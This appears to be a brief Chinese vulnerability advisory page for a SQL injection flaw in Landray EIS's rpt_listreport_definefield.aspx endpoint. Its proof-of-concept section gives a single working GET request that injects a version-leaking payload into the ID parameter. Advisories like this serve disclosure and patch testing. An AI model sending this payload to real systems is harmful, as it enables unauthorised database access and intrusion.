蓝凌EIS rpt_listreport_definefield.aspx SQL注入漏洞

日期: 2024-06-13 | 影响软件: 蓝凌EIS | POC: 已公开

漏洞描述

蓝凌EIS rpt_listreport_definefield.aspx SQL注入漏洞

PoC代码

GET /SM/rpt_listreport_definefield.aspx?ID=2%20and%201=@@version--+ HTTP/1.1

相关漏洞推荐